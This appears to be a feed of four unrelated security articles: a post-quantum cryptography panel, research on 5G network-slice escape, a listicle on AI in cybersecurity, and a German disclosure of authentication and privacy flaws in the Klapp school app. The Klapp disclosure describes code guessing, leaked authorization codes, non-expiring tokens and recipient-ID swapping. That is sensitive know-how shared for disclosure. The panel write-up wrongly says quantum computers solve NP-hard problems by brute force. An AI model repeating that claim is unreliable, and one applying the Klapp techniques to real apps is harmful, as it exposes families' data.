Panelists from an RSA Conference keynote agreed that organizations need to begin work on PQC migration, if they haven't already.

RSA CONFERENCE 2022 — Even the most future-facing panels at the 2022 RSA Conference in San Francisco are grounded in the lessons of the past. At the post-quantum cryptography keynote "Wells Fargo PQC Program: The Five Ws," the moderator evoked the upheaval from RSAC 1999 when a team from Electronic Frontier Foundation and Distributed.net broke the Data Encryption Standard (DES) in less than a day.

"We're trying to avoid the scramble" when classical cryptography techniques like elliptic curve and the RSA algorithm inevitably fall to quantum decrypting, said moderator Sam Phillips, chief architect for information security architecture at Wells Fargo. And he set up the high stakes encryption battles often have: "Where were all the DES implemented? Hint: ATM machines."

"We had to set up teams to see where-all we were using \[DES\], and then establish the migration plan based upon using a risk-based approach," Phillips said. "We're trying to avoid that by really trying to get ahead of the game and do some planning in this case."

Phillips was joined on stage by Dale Miller, chief architect of information security architecture at Wells Fargo, and Richard Toohey, technology analyst at Wells Fargo.

**A Brief Explanation of Quantum Computing**

Toohey, a doctoral candidate at Cornell University, handled most of the technical aspects of quantum computing during the panel. He explained, "For most problems, if you have a quantum calculator and a regular calculator, they can add numbers just as well. There's a very small subset of problems that are classically very hard, but for a quantum computer, they can solve very efficiently."

These problems that quantum computers handle better than conventional computers are called np-hard problems. "A lot of cryptography, specifically in asymmetric cryptography, relies on these np-hard type problems — things like elliptic curve cryptography; the RSA algorithm, famously — and when quantum computers are developed enough, they'll be able to brute-force their way through these," Toohey explained. "So that breaks a lot of our modern classical cryptography."

The reason why we don't have crypto-breaking quantum computers today, despite headline-making offerings from IBM and others, is because the technology to reach that level of power has not been accomplished yet. Toohey said, "To become a cryptographically relevant quantum computer, a quantum computer needs to have about 1-10 million logical qubits, and those logical qubits all need to be made up of about 1,000 physical qubits. Today, right now, the largest quantum computers are somewhere around 120 physical qubits." He estimated that to even muster the first logical qubit will take three years, and from there, it's got to scale up to "a million or so logical qubits. So it's still quite a few years away."

Another of the technical challenges that needs solving before we get these powerful quantum computers is the cooling systems they require. As Toohey said, "Qubits are incredibly sensitive; most of them have to be held at very low, cryogenic temperatures. So because of that, quantum computing architecture is incredibly expensive right now." Other problems include decoherence and error correction. The panel agreed that the combination of these issues means crypto-cracking quantum computers are 8-10 years away. But that doesn't mean we have a decade to address PQC.

**Now Is the Time**

The panel was named for the journalistic model of five questions that start with w, but that didn't come up until late in the audience Q&A portion. Miller said, "Sam was asking the what, the who, the why, the where, and the when. So I think we've covered that in our conversations here."

Most of the titular questions were somewhat vague and a matter of judgment. However, on the concept of when you should start planning for the post-quantum future, there was complete agreement: now. Miller said, "You've gotta start the process now, and you have to move yourself forward so that you are ready when a quantum computer comes along."

Phillips concurred, saying "There is not right now a quantum computer that is commercially viable, but the amount of money and effort going into the work there to move it forward because people recognize the benefits that are there, and we are recognizing the risk. We feel that it's an eventuality, that we don't know the exact time, and we don't know when it'll happen."

Toohey suggested beginning your preparations with a crypto inventory — again, _now_. "Discover where you have instances of certain algorithms or certain types of cryptography, because how many people were using Log4j and had no idea because it was buried so deep?" he said. "That's a big ask, to know every type of cryptography used throughout your business with all your third parties — that's not trivial. That's a lot of work, and that's going to need to be started now."

"What we're trying to do right now is drive ourselves toward a goal: five years" until Wells Fargo is ready to run post-quantum cryptography, Miller said. "The key is: large company, five years, is a very aggressive goal. So, the time to start is now, and that's one of the most important takeaways from this get-together."

**Crypto Agility Gets You to Quantum Resilience**

Pivoting is a key marker of agility for the panel, and agility is vital for being able to react to not just quantum threats, but whatever comes next. "The goal here should be crypto agility, where you're able to modify your algorithms fairly quickly across your enterprise and be able to counter a quantum-based attack," Miller said. "And I'm really not thinking on a day-to-day basis about when is the quantum computer going to get here. For us, it's more about laying a path and a track for quantum resiliency for the organization."

Toomey agreed on the importance of agility. He said, "Whether it's a quantum computer or new developments in classical computing, we don't want to be put in a position where it takes us 10 years to do any kind of cryptographic transition. We want to be able to pivot and adapt to the market as new threats come out."

Because there will be computers that can break current cryptography techniques, organizations do need to develop new encryption methods that stand up to quantum brute-force attacks. But that's only the half of it. Phillips said, "Don't just focus on the algorithms. Start looking at your data. What data are you transiting back and forth? And look at devaluing that data. Where do you need to have that confidential information, and what can you do to remove that from the exposure? It will help a lot not only in the crypto efforts, but in terms of who has access to the data and why they have to have access."

**You've Got to Have Standards**

One open question loomed over the discussion: When would NIST announce its picks for the new standards to develop for post-quantum cryptography? The answer is: not yet.

The lack of certainty is no cause for inaction, Miller said. "So NIST will continue to work with other vendors and other companies and research groups to look at algorithms that are further out there. Our job is to be able to allow those algorithms to come into place quickly, in a very orderly manner without disrupting business or breaking your business processes and be able to keep things moving along."

Phillips agreed. "That's one of the reasons for pushing on plug and play. Because we know that the first set of algorithms that come out may not satisfy the long-term need, and we don't want to keep jumping through these hoops every time somebody goes through it."

Toohey tied the standards question back into the concept of preparing _now_: "That way, when NIST finally finish publishing their recommendations, and standards get developed in the coming years, we're ready as an industry to be able to take that and tackle it."

He added, "That's going back to crypto agility, and this mindset that we need to be able to plug and play, we need to be able to pivot as an industry very quickly to new and developing threats."

Now Is the Time to Plan for Post-Quantum Cryptography

A successful attack against 5G networks could disrupt critical infrastructure, manipulate sensor data, or even cause physical harm to humans.

RSA CONFERENCE — San Francisco — While 5G security is not new as a topic of conversation, emerging attack vectors continue to come to the fore. Deloitte & Touche researchers have uncovered a potential avenue of attack targeting network slices, a fundamental part of 5G's architecture.

The stakes are high: Not just a faster 4G, next-generation 5G networks are expected to serve as the communications infrastructure for an array of mission-critical environments, such as public safety, military services, critical infrastructure, and the Industrial Internet of Things (IIoT). They also play a role in supporting latency-sensitive future applications like automated cars and telesurgery. A cyberattack on that infrastructure could have significant implications for public health and national security, and impact a range of commercial services for individual enterprises.

At the heart of any 5G network is a flexible, IP-based core network that allows resources and attributes to be assembled into individual "slices" — each of these network slices is tailored to fulfill the requirements requested by a particular application. For instance, a network slice supporting an IIoT network of sensors in a smart-factory installation might offer extremely low latency, long device battery life, and constricted bandwidth speed. An adjacent slice could enable automated vehicles, with extremely high bandwidth and near-zero latency. And so on.

Thus, one 5G network supports multiple adjacent network slices, all of which make use of a common physical infrastructure (i.e., the radio access network, or RAN). Deloitte collaborated on a 5G research project with Virginia Tech to explore whether it was possible to exploit 5G by compromising one slice, then escaping it to compromise a second. The answer to that turned out to be yes.

"Throughout our journey with Virginia Tech, our objective was uncovering how to make sure that appropriate security is in place whenever a 5G network is put in for any type of industry or any customer," Shehadi Dayekh, specialist leader at Deloitte, tells Dark Reading. "We saw network slicing as a core area of interest for our research, and we set about discovering avenues of compromise."

**Achieving Lateral Movement Via Network Slicing**

Abdul Rahman, associate vice president at Deloitte, notes that attacking one slice in order to get to a second could be seen as a form of container escape in a cloud environment — in which an attacker moves from one container to another, moving laterally through a cloud infrastructure to compromise different customers and services.

"When we look at the end-to-end picture of a 5G network, there's the 5G core, and then the 5G RAN, then there are the end devices and the users after the end devices," he says. "The core has really evolved to a point where a lot of the services are essentially in containers, and they've been virtualized. So there may then be a similar \[attack-and-escape\] process where we're able to influence or affect a device on network slice two from a device or a compromise within network slice one."

The research uncovered that an initial compromise of the first network slice can be achieved by exploiting open ports and vulnerable protocols, he explains. Or, another path to compromise would involve obtaining the metadata necessary to enumerate all of the services on the network, in order to identify a service or a set of services that may have a vulnerability, such as a buffer overflow that would allow code execution.

Then, to achieve "slice-escape," "there are capabilities in the wireless space to emulate tons of devices that can join networks and start causing some stress on the core network," Dayekh says. "It's possible to bring in some scanning capabilities to start exploiting vulnerabilities across slices."

A successful attack would have a number of layers and steps, and would be non-trivial, Deloitte found — but it can be done.

From a real-world feasibility perspective, "it's really dependent on how much money is spent," Dayekh says, adding that cyberattackers would likely make an ROI calculation when weighing whether an attack is worth the time and expense.

"It's about how serious \[and hardened\] the network is, if it's a mission-critical network, and how serious the target application is," he explains. "Is it an application for, say, shelf replenishment or cashierless checkout, or is it a military or government application?"

If the attacker is a well-funded advanced persistent threat (APT) interested in mounting destructive attacks on, say, an automated pipeline, the approach would be more convoluted and resource-intensive, Rahman adds.

"This sets the stage for a bad actor that utilizes advanced recon and surveillance-detection techniques, to minimize on the blue side being seen," he says. "You utilize observation to determine avenues of approach and key terrain, while ensuring concealment. If we're going to recon a network, we want to do it from a place where we can scan the network and obfuscate our reconnaissance traffic amongst all the other traffic that's there. And they're going to build this network topology, aka an attack graph, with nodes that have metadata associated with enumerative services around what we would like to attack."

**Real-World Risk**

When it comes to potential outcomes of a successful attack, Rahman and Dayekh used the example of a campaign against an industrial sensor network for a smart-factory application.

"Ultimately, we can deploy malware that can actually impact the data that's gathered from those sensors, whether it's temperature, barometric pressure, its line of sight, computer vision, whatever that may be," Rahman notes. "Or it may be able to occlude the image or maybe only send back a portion of the results by manipulating what the sensor has the ability to see. That could potentially cause false readings, false positives, and the impact is huge for manufacturing, for energy, for transportation — any of those areas that depend on sensors to give them near-real-time outputs for things like health and status."

The Internet of Medical Things (IoMT) is another area of concern, due to the ability to directly impact patients using remote health services such as kidney dialysis or liver monitoring, or those who have a pacemaker.

There's also another form of attacks that involve deploying malware on vulnerable IoT devices, then using them to jam or flood the air interfaces or take up shared computational resources at the edge. That can lead to denial of service across slices since they all share the same RAN and edge computing infrastructure, Deloitte found.

**Defending Against 5G Network-Slicing Attacks**

When it comes to defending against attacks involving network slicing, there are at least three broad layers of cybersecurity to deploy, the researchers note:

*   Convert threat intelligence, which consists of indicators of compromise (IOCs), into rules.
*   Use artificial intelligence and machine learning to detect anomalous behaviors.
*   Implement platforms that contain standard detection mechanisms, filtering, the ability to create automation, integration with SOAR, and alerting.

It's important, as ever, to ensure defense in depth. "The rules have a shelf life," Rahman explains. "You can't totally depend on rules because they get aged off because people create malware variants. You can't totally depend on what an AI tells you about probability of malicious activity. And you can't really believe in the platform because there may be gaps."

Much of the defense work also has to do with gaining a view into the infrastructure that doesn't overwhelm defenders with information.

"The key is visibility," Dayekh says, "because when we look at 5G, there's massive connectivity: A lot of IoT, sensors, and devices, and you also have containerized deployments and cloud infrastructure that scales up and down and gets deployed in multiple zones and multiple hybrid clouds, and some clients have more than one vendor for their cloud. It's easier when we don't have a lot of slices or we don't have a lot of device IDs or SIM cards or wireless connections. But there are potentially millions of devices that you may have to look at and correlate data for."

There's also ongoing management to consider, since the 5G standard is updated every six months with new features.

As a result, most operators are still scratching the surface on the amount of work they have to put into shoring up security for 5G networks, the researchers say, noting that the workforce shortage is also affecting this segment. And that means that automation will be required to handle tasks that need to be done in a repeatable manner.

"Automation from a source perspective can go out to these devices and reconfigure them on the fly," Rahman says. "But the question is, is do you want to do that in production? Or do you want to test that first? Typically, we are risk averse, so we test when we do change requests, and then we vote on it. And then we deploy those changes in production, and that takes a certain amount of time. But those processes can be automated with DevSecOps pipelines. Solving this will take some out-of-the-box thinking."

An Emerging Threat: Attacking 5G Via Network Slices

By Owais Sultan
Let’s talk about how AI in cybersecurity protects the corporate networks of companies. Technological progress has not only…
This is a post from HackRead.com Read the original post: How to use AI in cybersecurity?

****Let’s talk about how AI in cybersecurity protects the corporate networks of companies.****

Technological progress has not only pleasing but also bad consequences. Together with the accelerated pace of corporate security systems development, new and more sophisticated types of cyber-attacks are emerging.

According to the World Economic Forum, the protection measures taken by enterprises become outdated instantly. Over the previous year, the number of attacks increased by 30%, and this alarming trend continues.

The market is short of about 2.72 million cybersecurity professionals to deal with the growing number of threats. This is where artificial intelligence can help businesses. Let’s talk about six AI use cases in cybersecurity.

**Statistics on AI use in cybersecurity**

Researchers contributing to the 2022 Cybersecurity Almanac predict that spending on fighting cybercrimes will rise to $10.5 trillion. This is three times more than in 2015 ($3 trillion). Given the fact that the amount of global data is growing, it becomes more difficult to track and prevent vulnerabilities.

For example, 80% of telecommunications organizations are confident that they will not be able to respond to cyber-attacks without AI. The professional sector is a target for cyber villains (934 incidents were recorded in 2020). The public sector, manufacturing, and healthcare suffer from cyberattacks.

In 2020, AI in cybersecurity was worth more than $10 billion, and by 2027, the price will increase by almost 4.5 times. IBM estimates that companies that lack AI spend three times as much to mitigate cyberattacks as companies with deployed automated tracking systems.

Nearly half of the managers surveyed by Capgemini say they use a smart algorithm to detect cyber threats. With its help, 34% of these professionals predict attacks and 18% respond to incidents.

Based on the above trends, Meticulous Research says that AI in cybersecurity will grow by 24% per year to reach $46 billion by 2027.

**Six main AI use cases in cybersecurity**

Imagine a campus that consists of several buildings. Getting inside is not difficult, because it is impossible to put a guard at each door. This is where AI helps: cameras read the faces of visitors and find those who “sit on someone’s tail” following employees with passes to enter buildings. This may be a worker who was too lazy to show a pass or a scammer.

The larger the office, the higher the risk of intrusion, and the more useful AI systems for face recognition are. In a video, an algorithm singles out people who violate the security policy. An image of a person’s face is compared with the database of staff members’ photographs; thus, the system defines if it is an employee or a stranger who decided to illegally enter the office.

If we consider the use of AI in a corporate network or on the Internet, we can talk about six main options for using a smart algorithm.

*   **Detection of malicious code and malicious activity in corporate networks**

AI automatically classifies domains by analyzing DNS traffic to identify C&C, malicious, spam, phishing and clone domains, and so on. Previously, to manage this environment, it was enough to have good blacklists. They coped with their task albeit with regular updates and with large volumes.

Today, domains are created in 1-2 minutes, used no more than 2-3 times within half an hour, and then criminals switch to other domains. To track them, blacklisting is not enough: you need to use AI technology. A smart algorithm learns to detect such domains and block them immediately.

*   **Encrypted traffic analysis**

According to Cisco, more than 80% of Internet traffic is encrypted. It needs to be analyzed. You can apply the “government man in the middle” scheme or use AI technology, which, without encryption and decryption, allows you to identify the following issues by metadata and network packets and without analyzing the payload:

*   Malicious code; 
*   Malware family;
*   Applications that are used;
*   Devices that work within the framework of an encrypted TLS session or SSL of one version or another.

These are technologies that work in practice and allow you to understand what is happening inside the encrypted traffic the volume of which is growing. And you needn’t invest much in it.  

*   **Detection of fake photos and substituted pictures.**

An algorithm recognizes whether the face of a person in the photo has been replaced with someone else’s picture. This feature is particularly useful for remote biometric authentication in financial services. It prevents scammers from creating fake photos or videos and presenting themselves as legal citizens who could be granted a loan. Thus, they won’t steal the money of others. 

*   **Recognition of voice, language, and speech.**

This AI feature is used to detect information leaks and read unstructured information in non-machine readable formats. This information enriches the data from firewalls, gateways, proxy systems, and other technical solutions that provide structured data.

Thus, you will know who and when accessed the Internet and whether they used corporate or departmental networks. AI helps enrich this information with data from news, company newsletters, and so on.

*   **Providing recommendations**

Based on statistics, AI makes recommendations on what protection tools to use or what settings need to be changed to automatically increase the security of a corporate network. For example, the Massachusetts Institute of Technology has created AI2, a system that detects unknown threats with a probability of up to 85%.

The more analyses the system performs, the more accurately it gives the next estimate due to the feedback mechanism. Moreover, a smart algorithm does this on such a scale and at such a speed that human defenders would not be able to handle.

*   **Automation of software vulnerability search**

A vulnerability is a bug in a program that allows someone to benefit from it (for example, extract data for sale, transfer money, steal private data from a phone, and so on). Thanks to AI, it has become possible to search for such errors automatically.

AI looks for vulnerabilities in a program and examines the application interface. If it finds ransomware on a computer, it immediately disconnects its user from the network, thereby saving the rest of the company from dangerous infection.

**Conclusion**

AI in cybersecurity has great prospects. But it must be handled reasonably, like any other technology. It is not a silver bullet and having even the most advanced technology does not mean 100% protection. AI will not save you from serious attacks caused by neglecting basic cybersecurity rules. A smart algorithm should be implemented if a clear ecosystem that can adapt to a changing corporate network has been built.

AI will be genuinely effective if it is developed, corrected, and tuned. This is time-consuming and difficult work, which will benefit if the technology is used carefully and not for the sake of being trendy.

**More AI Topics**

1.  Fields of application of artificial intelligence
2.  How Artificial intelligence (AI) Stops Cybercriminals
3.  ‘Optical Adversarial Attack’ uses a low-cost projector to trick AI
4.  Ways to Take Advantage of Artificial Intelligence in Technology
5.  Website uses Artificial Intelligence to create utterly realistic human faces

How to use AI in cybersecurity?

A vulnerability was found in Klapp App and classified as problematic. This issue affects some unknown processing of the JSON Web Token Handler. The manipulation leads to weak authentication. The attack may be initiated remotely.

**Knapp daneben ist auch vorbei**

Wir als modzero sehen seit einem Jahrzehnt Sicherheitsschwachstellen und Datenschutzvergehen in verschiedensten Variationen. Unabhängig von der Art oder Komplexität einer Schwachstelle sehen wir sehr oft einen wenig risikobewussten Umgang mit Daten und Ressourcen. Wir schreiben das Jahr 2020, und noch immer werden Applikationen mit der heissen Nadel gestrickt. Time-to-Market hat eine so hohe Priorität, dass nicht einmal grundlegende Sicherheitsprinzipien in die Lösungsarchitektur oder das individuelle Applikationsdesign einfliessen. Man findet an jeder Ecke Applikationen und Datenverarbeitungssysteme, die schlecht, d.h. unsicher, mit den ihnen anvertrauten Daten umgehen. Dies ist umso gravierender, wenn es sich um personenbezogene Daten oder gar Gesundheitsdaten handelt.

In unserem Artikel Mit Webapps gegen COVID-19 wollten wir darauf aufmerksam machen, dass jeder eine Verantwortung hat, dass Software angemessen sicher wird. Heute möchten wir dieses Thema mit einem weiteren Beispiel erneut aufgreifen. Die anhaltende Corona-Pandemie eröffnet neue Herausforderungen aber auch Möglichkeiten bei der Digitalisierung und der Datenverarbeitung. In allen Bereichen sucht man nach Lösungen, und spätestens während des totalen Lockdowns haben auch Schulen festgestellt, dass sie noch Nachholbedarf im digitalen Bereich haben. Es wurde alles eingesetzt was verfügbar war: Zoom, Teams, WhatsApp, Facebook Messenger. In der Schweiz wurde bereits vor drei Jahren eine schweizerische Plattform namens Klapp ins Leben gerufen, welche insbesondere die Kommunikation zwischen Eltern und Schule und Lehrpersonen vereinfachen soll. _Einfache Kommunikation, die klappt!"_, so der Slogan des Unternehmens. Zu Zeiten von Corona hat diese Plattform einen massiven Nutzer-Zuwachs erhalten. Unter den Nutzern ist auch eine unserer MitarbeiterInnen.

**Wie funktioniert Klapp?**

Bei Klapp handelt es sich um ein schweizerisches Start-Up mit dem Sitz in Fislisbach (AG). Zum Zeitpunkt der Veröffentlichung gibt das Unternehmen an mehr als 200 Schulen, 8'600 Lehrpersonen und 45'000 Eltern eine Plattform zur Kommunikation zu bieten. Hier werden gemäss seinen Angaben täglich rund 3'000 individuelle Nachrichten versendet. (siehe hierzu Angaben durch Klapp) Die Daten werden ausschliesslich in der Schweiz gespeichert. Neben der Benutzung im Browser kann die App kann auch mit dem Smartphone (iOS und Android) genutzt werden.

Aus technischer Sicht ist Klapp eine cordova-basierte Web- und Mobile-App. Zur Registrierung als Elternteil oder Schüler benötigt man einen sogenannten Autorisierungs-Code. Nach erfolgreicher Registrierung ist der Zugriff auf die jeweilige Klasse und die damit verbundenen Funktionalitäten möglich. Während der Kurzanalyse wurden folgende Haupt-Funktionen als angemeldetes Elternteil identifiziert:

*   Gruppen und individual Chats
*   Versand von Dateien zwischen Kommunikationspartnern
*   Kalenderfunktionen
*   Informationen über die Klassenmitglieder
*   Namen der Kinder und registrierte Eltern
*   E-Mail-Adressen und Rufnummern (wenn freigegeben)

Damit Schulen die Klapp-Plattform nutzen können, wird zunächst ein Ex- und Import von Stammdaten vorgenommen. Zu diesem notwendigen Ex- und Import Prozess hat Klapp diverse Anleitungen veröffentlicht. Nach erfolgreichem Daten-Import können die Lehrpersonen Einladungsschreiben für die Eltern generieren. Diese enthalten Informationen über Klapp und sind personalisiert. Jedes dieser Einladungsschreiben hat nämlich zusätzlich den Namen des Kindes und einen Autorisierungs-Code für die Eltern aufgedruckt.

Beispielhaftes Einladungsschreiben mit Autorisierungs-Code und Vor- Nachname des Kindes

Dieser Autorisierungs-Code wird bei der Registration benötigt. Hiermit autorisiert sich die Anwenderin als Elternteil eines bestimmten Kindes. Der Autorisierungscode stellt somit das eindeutige Merkmal dar, um die betreffende Person zu identifizieren.

Registrierungs Ansicht in der iOS-App

Der Autorisierungs-Code hat das folgende Format: P-ABCDE1. Das Präfix _"P-"_ steht für _"Parent"_, Autorisierungs-Codes von Schülerinnen haben das Präfix _"S-"_, was für _"Student"_ steht. Die darauffolgenden Werte sind sechs alphanumerische Zeichen, Das bedeutet, dass es maximal 2.17 Milliarden mögliche _"Parent"_ oder _"Student"_ Codes gibt - Bei einer Anfrage pro Sekunde an den Klapp-Server benötigt man 3,7 Wochen um alle möglichen Autorisierungs-Codes zu erraten. Geht man von aktuell 45'000 verfügbaren Autorisierungs-Codes aus, trifft man mit einer Warscheinlichkeit von 52.49%, bei der selben Anfragerate, nach 10 Stunden mindestens einen gültigen Autorisierungs-Code. Würde man den möglichen Raum von Zeichen um Kleinbuchstaben und die Länge des Autorisierungs-Codes auf 10 erweitern, so bräuchte man, bei der angenommenen Anzahl an Anfragen pro Sekunde, 16 Millionen Jahre um alle durchzuprobieren. Die Annahme, dass nur eine Anfrage pro Sekunde möglich ist gilt als sehr konservativ, nicht selten können aktuelle Webserver bis zu 1000 Anfragen/Sekunde abarbeiten.

**Wie steht es bei Klapp um den Datenschutz?**

Die Daten der Applikation (Nachrichten, Chats und Bilder) werden zwar über einen _verschlüsselten Kanal_ auf den Klapp-Server übertragen, werden auf dem Server aber _unverschlüsselt gespeichert_. Das heisst, dass mindestens der Betreiber und alle Involvierten, welche die Daten prozessieren, Informationen mitlesen und manipulieren könnten. Im Falle eines Klassenverbundes heisst das im einfachsten Fall, dass die Klapp GmbH sowie die Dienstleister für den Nachrichtenversand über die registrierten Kinder und Eltern sowie Klassengruppierungen und die versendeten Informationen Bescheid wissen. Werden sensible Informationen wie Krankheiten oder vielleicht Kritik- oder Entwicklungspunkte der Kinder zwischen Personen ausgetauscht, sind diese nicht umfassend gesichert und es ist nicht ersichtlich ob man mit dem legitimen Kommunikationspartner Daten austauscht.

In Ihrer Datenschutzerklärung verspricht die Klapp GmbH:

> "Wir geben keine Personendaten an Dritte weiter und erzielen auch keinen kommerziellen Nutzen daraus. Ihre Personendaten, die Sie uns zur Verfügung stellen, werden von uns weder verkauft, vermietet noch gehandelt".

Weiter schreibt die Klapp GmbH:

> "Ihre Daten speichern wir in der Schweiz. Benutzerdaten werden in der Schweiz gespeichert und verarbeitet und unsere Partner halten die schweizerischen und europäischen Datenschutzverordnung ein".

Und _"Privacy by Design"_ wird ebenfalls als Merkmal benannt. Die Aussage _"Wir wollen mit Ihren Daten kein Geld verdienen. Ihre Benutzerdaten werden unter keinen Umständen an Dritte verkauft oder für Werbung verwendet."_ wirkt vertrauenserweckend.

Auch die Schulen scheinen von der Lösung und deren Sicherheit überzeugt. Auf Anfrage, warum Vor- und Familienname an Dritte ohne Zustimmung mitgeteilt werde teilte eine Schule mit:

> "Die Firma Klapp hat nach der Registrierung nur Name und Vorname plus Schule Ihres Kindes. Diese gehören nach meinem Wissen nicht zu den besonders schützenswerten Daten. Es ist uns aber bewusst, dass ein sorgfältiger Umgang mit Daten zentral ist. Daher haben wir uns bei der App auch für die Firma Klapp entschieden, die einen hohen Standard bei der Datensicherheit garantiert".

Bei einer technischen Betrachtung zeigt sich ein anderes Bild. Klapp verwendet beispielsweise für die Übermittlung der Daten Push-Nachrichten, welche über den US-Amerikanischen Dienst OneSignal versendet werden. Hier werden neben dem Vor- und Familiennamen des Absenders und der Betreff der Nachricht auch weitere Metainformationen über das verwendete Gerät und das Betriebssystem und des Netzwerkbetreibers gesammelt.

Push-Benachrichtigung enthält Informationen über den Absender sowie Betreff der Nachricht

POST /players/8a77f111-c146-402b-88f3-18d874c19872/on\_session HTTP/1.1
Host: api.onesignal.com
Content-Type: application/json
Cookie: \_\_cfduid=dd2b3c2801e2179392b0232eac71bf6bf1597813825
Connection: close
If-None-Match: W/"698f061ae145e46b912b7e8e00450320"
Accept: application/vnd.onesignal.v1+json
SDK-Version: onesignal/ios/021402
Accept-Language: de-ch
Content-Length: 434
Accept-Encoding: gzip, deflate
User-Agent: Klapp/2.0.1 CFNetwork/1126 Darwin/19.5.0

{
  "app\_id" : "bb3877cc-afc0-4d81-ac73-9339554c7686",
  "net\_type" : 0,
  "device\_type" : 0,
  "sdk" : "021402",
  "identifier" : "b5c9f6956a9606a93f564ac0677342ffafd9540b6c34ba170da574fd3f77dc08",
  "language" : "de-CH",
  "device\_os" : "13.5.1",
  "game\_version" : "2.0.1",
  "timezone" : 7200,
  "ad\_id" : "CF7A0B86-311E-4EF7-A469-F7A5322B206A",
  "notification\_types" : 31,
  "carrier" : "Salt",
  "device\_model" : "iPhone11,2"
}

Bei dem Versand via E-Mail verwendet Klapp den Dienstleister Mailgun - ebenfalls ein US-Unternehmen (siehe Datenschutzerklärung). Im Gegensatz zu den Push-Nachrichten beinhalten die E-Mail-Nachrichten auch die versendete Information, sowie Hyperlinks zu den allenfalls angehängten Dokumenten. Was bedeutet, dass neben Klapp auch Mailgun in der Lage ist, sämtliche E-Mail-Inhalte zu lesen oder zu manipulieren. Ob diese Firmen sich der hiesigen Gesetzeslage und Richtlinien unterwerfen, ist für uns aktuell nicht prüfbar. Wir möchten aber auch darauf hinweisen, dass die Daten auch ungewollt als Folge eines Erpressungsversuches oder eines Hacker-Angriffes bei dem Dienstleister geleakt werden könne .

E-Mail erhalten über _Mailgun_ enthält den genauen Text sowie Links zu den angehängten Dateien

Wir geben der Firma Klapp recht. Privacy by Design ist wichtig... und zwar genau aus dem Grund, dass niemand unautorisiertes Drittes unsere Daten einsehen können sollte. Genau deshalb sollte konsequent Ende-zu-Ende-Verschlüsselung eingesetzt werden, wie es zum Beispiel im Leitfaden des Datenschutzbeauftragten des Kantons Zürich empfohlen wird. Deshalb werden Instant-Messengers wie Signal oder Threema von vielen bevorzugt, da der Transportweg sowie jede Zwischenspeicherung verschlüsselt ist und erst am eigentlichen Endgerät entschlüsselt werden kann.

Nachdem wir uns dem Datenschutzversprechen der Firma Klapp GmbH und dem Thema Datenschutz gewidmet haben, möchten wir auf einige der technischen Unzulänglichkeiten eingehen. Viele der identifizierten Fehlerklassen sind trivial und bekannt. Auch wenn die Auswirkungen bei dieser Applikation möglicherweise gering ausfallen, möchten wir diese aufführen, weil wir diese immer wieder sehen.

**Und wie steht es um die Informationssicherheit?**

Datenschutz und Informationssicherheit sind eng miteinander verbunden und das Befolgen von Sicherheitsempfehlung wichtig, um den Datenschutz überhaupt zu Implementieren. Eine oberflächliche Betrachtung der Plattform hat gezeigt, dass grundlegende Sicherheitsprinzipien der Informationstechnik sowie der sicheren Entwicklung für mobile Anwendungen nicht befolgt wurden. Dies ist leider auch im Jahr 2020 immer noch häufig anzutreffen. Gerade in frühen Projektphasen ist die Erarbeitung von Bedrohungsmodellen und das Definieren von Sicherheitsanforderungen ein Kernpunkt, um später beim Lösungsdesign sowie der eigentlichen Entwicklung die richtigen Massnahmen und Methoden zu ergreifen. Gerade die gefundenen Trivialfehlerklassen zeigen, dass Datenschutz und Sicherheit während der Entwicklung der Plattform keine Schwerpunktthemen waren.

Während der Nutzung der Applikation konnte beobachtet werden, dass nicht nur der eigene Autorisierungs-Code vom Klapp-Server übermittelt wird, sondern auch die Autorisierungs-Codes, welche es den anderen Eltern ermöglichen sich eindeutig zu identifizieren.

Auszug aus der Server-Antwort. Zu sehen ist ein JSON-Objekt mit Informationen zu Kindern und Eltern. Ausserdem sind die Autorisierungs-Codes der Eltern enthalten.

Das bedeutet, dass jeder Empfänger das eindeutige Identifizierungsmerkmal aller Klassenteilnehmer besitzt und deren Identität übernehmen kann. Die Auswirkung eines Missbrauchs erscheint vielleicht aktuell nicht weiter schlimm bei einer solchen Verwendung. Soziales Schadenspotenzial ist auf jeden Fall vorhanden und Vertrauensmissbrauch ist möglich. Wichtig ist jedoch zu verstehen, dass eine zukünftige Funktionserweiterung der Plattform noch andere betrügerische Aktivitäten ermöglichen könnte, die heute vielleicht noch nicht absehbar sind. Hätte Klapp eine Implementierung nach den eigens aufgestellten Prinzipien der Datensparsamkeit und Need-to-Know Basis gewählt, wäre dieser Fehler gar nicht aufgetreten. Diese Schwachstelle wurde umgehend dem Klapp-Team gemeldet und Sie wurde am Abend des 24. August 2020 durch ein serverseitiges Update behoben. Daraufhin hat das Klapp-Team auch eine interne Nachricht an die BenutzerInnen versendet in der zu einer manuellen Überprüfung der registrierten Elternteile aufgerufen wird.

In-App Benachrichtigung des Klapp-Teams nachdem die Autorisierungs-Code-Leck Schwachstelle behoben wurde.

Ebenfalls ein Klassiker unter den trivialen Fehlern in Applikationen ist eine Vertrauensstellung durch sehr langlebige Authentisierungsmerkmale. Im Falle der Klapp-Applikation sind es JSON-Web-Token ohne Ablaufzeitpunkt. Jeder, der in den Besitz eines solchen Tokens gelangt, kann ohne zusätzliche Merkmale wie Benutzername oder Passwort andere Nutzer imitieren und hat somit automatische die Identität und Berechtigungen des legitimen Eigentümers. Bei der Klapp-Applikation werden diese Tokens auf dem Endgerät ohne zusätzliche Schutzmassnahmen abgelegt und gelangen so auch auf Backup-Datenträger oder Cloud-Dienste. Auch hier möchten wir darauf hinweisen, dass die Auswirkungen zum Glück in dem heutigen Anwendungsfall moderat ausfallen. Bekannte Schwachstellen zu implementieren ist auf jeden Fall eine schlechte Praxis, auch wenn sie aktuell wenig Relevanz haben.

Unsterblicher JSON-Web-Token da kein Ablaufzeitpunkt (_exp_ angegeben ist.)

Die SQLite Datenbank ist nicht verschlüsselt. Auch die darin enthaltenen Informationen sind nicht durch die App verschlüsselt.

Die SQLite Datenbank befindet sich in einem Geräte Backup.

Der Versand von individual Nachrichten an Lehrer ist eine von der Plattform vorgesehene Funktionalität. Wählt man "Neue Nachricht" aus so erscheint eine Auflistung der Lehrer, welche zum Empfang von Nachrichten autorisiert sind. Jeder Lehrer hat in der Plattform eine eindeutige Benutzerkennung, Beispielsweise 5f3bf6370452c910612c71be. Diese wird beim Versand der Nachricht angegeben. Eine solche Benutzerkennung haben auch Eltern und Schüler. Tauscht man die Benutzerkennung des Lehrers mit der eines anderen Elternteils aus, so wird die Nachricht an den gewünschten Empfänger übermittelt.

In-App Nachricht an ein anderes Elternteil versendet.

